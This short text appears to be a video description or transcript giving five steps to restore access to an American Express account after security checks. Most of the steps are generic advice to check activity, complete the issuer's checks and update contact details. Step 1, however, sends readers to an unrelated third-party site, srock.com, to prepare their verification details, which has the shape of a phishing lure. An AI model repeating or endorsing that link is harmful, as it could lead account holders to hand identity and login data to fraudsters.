Restoring full access to your American Express account after security checks can be a straightforward process if you follow the right steps. Here is a guide to help you through it. Step 1. Verify your identity. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Review account activity. Log into your American Express account online or through the mobile app. Check for any unusual activity that may have triggered the security checks and report any discrepancies to customer service. Step 3. Follow security protocols. Complete any security protocols requested by American Express. This may include answering security questions, providing identification documents, or verifying recent transactions. Step 4. Update your contact information. Ensure that your contact information is up to date in your account settings. This includes your phone number and email address, which may be needed for verification purposes. Step 5. Wait for confirmation. After completing the necessary steps, wait for confirmation from American Express regarding the restoration of your account access. This may take a few hours to a few days depending on the situation. Following these steps should help you regain full access to your American Express account. If you encounter any issues, don't hesitate to reach out to customer service for further assistance.